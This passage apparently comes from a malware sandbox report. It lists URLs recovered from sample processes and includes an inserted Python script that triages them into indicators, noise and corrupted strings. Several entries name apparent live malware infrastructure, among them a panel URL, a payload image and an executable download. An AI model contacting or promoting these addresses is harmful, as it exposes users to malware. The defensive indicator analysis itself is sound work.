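Source: rovwer.exe, 0000000F.00000002.548035575.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php?scr=12
Source: rovwer.exe, 0000000F.00000002.558304896.sdmp String found in binary or memory: http://2w3.56.146.174/g84kvj4jck/index.php
Source: 816F.exe, 0000001A.00000002.572240339.sdmp String found in binary or memory: http://91.213.50.70
Source: 816F.exe, 0000001A.00000002.564423436.sdmp String found in binary or memory: http://91.213.50.70/Wavafursq.jpeg
Source: 816F.exe, 0000001A.00000002.574232042.sdmp String found in binary or memory: http://91.213.50.704
Source: vbc.exe, 00000021.00000002.523011791.sdmp String found in binary or memory: http://svedbergbryanthusnonarithmetical.com/v6/down/argq.exe
Source: vbc.exe, 00000021.00000002.523011791.sdmp String found in binary or memory: http://91.://svedbergbryanthusnonarithmetical.com/v6/down/argq.exe
Source: explorer.exe, 00000023.00000000.445464817.sdmp String found in binary or memory: http://o36fafs3sn6xou.com/
Source: 86EE.exe, 0000002D.00000003.493388145.sdmp String found in binary or memory: http://o36fafs3sn6xou./1148
Source: 2B4A.exe, 0000000C.00000002.593637539.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: 2B4A.exe, 0000000C.00000002.592021654.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: 453D.exe.1.dr String found in binary or memory: http://s.symcb.com/universal-root.crl0
"""

# "Source: <first process or dropped file> ... String found in binary or memory: <string>"
LINE_RE = re.compile(
    r"^Source:\s+(?P<proc>[^\s,]+).*?String found in binary or memory:\s+(?P<url>\S+)\s*$"
)

# Assumed allowlists. FRAMEWORK_HOSTS are XML namespace identifiers that every .NET/WCF
# binary carries; PKI_HOSTS come from Authenticode certificate CRL/OCSP pointers.
FRAMEWORK_HOSTS = {"schemas.xmlsoap.org", "docs.oasis-open.org", "tempuri.org",
                   "schemas.microsoft.com", "www.w3.org"}
PKI_HOSTS = {"crl.globalsign.net", "s.symcb.com", "s.symcd.com"}

# A character that starts a new URL component: if the extra bytes after a known
# shorter string begin with one of these, the longer string is a real variant.
TAIL_BOUNDARY = "/?#&="


def parse_report(text):
    """Yield (process, raw_string) for every 'String found' line; other lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.group("proc"), m.group("url")


def valid_host(host):
    """True for a well-formed IPv4 literal or a plausible hostname (TLD not all digits)."""
    if not host:
        return False
    if re.fullmatch(r"[0-9.]+", host):          # numeric: must be exactly four octets
        try:
            ipaddress.IPv4Address(host)
            return True
        except ValueError:
            return False
    if not re.fullmatch(r"[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+", host):
        return False
    return not host.rsplit(".", 1)[-1].isdigit()  # "2w3.56.146.174" is not a hostname


def canonicalise(urls):
    """Map each observed string to its canonical URL.

    Processing strings shortest-first, a string that extends an already kept string
    by bytes that do not start a new path/query component is treated as that string
    plus trailing memory noise (index.php%J.J -> index.php, ?scr=12 -> ?scr=1).
    """
    canon, kept = {}, []
    for u in sorted(set(urls), key=len):
        base = None
        for k in kept:                           # kept is shortest-first: last hit wins
            if u.startswith(k) and u[len(k):len(k) + 1] not in TAIL_BOUNDARY:
                base = k
        canon[u] = base or u
        if base is None:
            kept.append(u)
    return canon


def triage(text):
    """Return (iocs, noise, corrupted).

    iocs:      {canonical_url: sorted processes that held it}
    noise:     {canonical_url: "framework-namespace" | "pki"}
    corrupted: raw strings whose host is malformed (partially overwritten memory)
    """
    observed = list(parse_report(text))
    canon = canonicalise(u for _, u in observed)
    iocs, noise, corrupted = defaultdict(set), {}, []
    for proc, raw in observed:
        url = canon[raw]
        try:
            host = urlsplit(url).hostname or ""
        except ValueError:
            host = ""
        if not valid_host(host):
            corrupted.append(raw)
        elif host in FRAMEWORK_HOSTS:
            noise[url] = "framework-namespace"
        elif host in PKI_HOSTS:
            noise[url] = "pki"
        else:
            iocs[url].add(proc)
    return {u: sorted(p) for u, p in iocs.items()}, noise, corrupted


if __name__ == "__main__":
    iocs, noise, corrupted = triage(SAMPLE_LINES)
    for url, procs in sorted(iocs.items()):
        print("IOC      ", url, "<-", ", ".join(procs))
    for url, kind in sorted(noise.items()):
        print("noise    ", kind, url)
    for raw in corrupted:
        print("corrupted", raw)
```

Run on the full report, the prefix collapse only works when the clean shorter string was also observed; a host with trailing noise and no clean sibling (the page's http://s.symcd.com06 is one) passes the hostname check and lands in the IOC bucket, so that bucket is a review list, not a blocklist. The process column is also worth keeping: http://o36fafs3sn6xou.com/ is held by explorer.exe, which only makes sense alongside the injection signatures in the report header.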
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.597552021.0000000002B50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.595445295.0000000002AAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id15
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id16
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19
Source: 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19Response(5
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1Response(5
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.597808384.0000000002B64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22Response(5
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id23
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.597808384.0000000002B64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id24
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2Responsest(5
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4(5
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4Sy(5
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.597808384.0000000002B64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.596318872.0000000002B15000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: 453D.exe.1.dr String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: 453D.exe.1.dr String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: 453D.exe.1.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: 816F.exe, 0000001A.00000003.503017067.00000000060D1000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.503500736.00000000060CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: explorer.exe, 00000001.00000000.299404500.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.286478895.0000000001425000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.276466462.000000000F276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.307788321.0000000001425000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.257994552.0000000001425000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 816F.exe, 0000001A.00000003.486913781.00000000060F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.com
Source: 816F.exe, 0000001A.00000003.484605971.00000000060F4000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.485467854.00000000060F4000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.485684143.00000000060F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comU
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: 816F.exe, 0000001A.00000002.591760337.00000000060C0000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: 816F.exe, 0000001A.00000002.591760337.00000000060C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.coml1
Source: 816F.exe, 0000001A.00000002.591760337.00000000060C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comol
Source: 816F.exe, 0000001A.00000002.591760337.00000000060C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comt
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: 816F.exe, 0000001A.00000003.481873237.00000000060F1000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.482552811.00000000060F1000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.483230683.00000000060F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/U
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 816F.exe, 0000001A.00000003.481873237.00000000060F1000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.482552811.00000000060F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn3
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 816F.exe, 0000001A.00000002.591760337.00000000060C0000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: argq.exe.33.dr, argq[1].exe.33.dr String found in binary or memory: http://www.info-zip.org/zip-bug.html;
Source: 816F.exe, 0000001A.00000003.497487573.00000000060CE000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.504087152.00000000060CE000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.506137806.00000000060CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 816F.exe, 0000001A.00000003.500229270.00000000060CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/G
Source: 816F.exe, 0000001A.00000003.502347136.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.504941447.00000000060CC000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.503017067.00000000060D1000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.503500736.00000000060CC000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.504087152.00000000060CE000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.506137806.00000000060CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y
Source: 816F.exe, 0000001A.00000003.494973945.00000000060C5000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.497487573.00000000060CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/c
Source: 816F.exe, 0000001A.00000003.506137806.00000000060CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: 816F.exe, 0000001A.00000003.502347136.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.503017067.00000000060D1000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.500229270.00000000060CE000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.503500736.00000000060CC000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.504087152.00000000060CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/P
Source: 816F.exe, 0000001A.00000003.502347136.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.504941447.00000000060CC000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.503017067.00000000060D1000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.500229270.00000000060CE000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.503500736.00000000060CC000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.504087152.00000000060CE000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.506137806.00000000060CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/c
Source: 816F.exe, 0000001A.00000003.494973945.00000000060C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/typo
Source: 816F.exe, 0000001A.00000003.500229270.00000000060CE000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.497487573.00000000060CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/u
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.503500736.00000000060CC000.00000004.00000800.00020000.00000000.sdmp, 816F.exe, 0000001A.00000003.504087152.00000000060CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
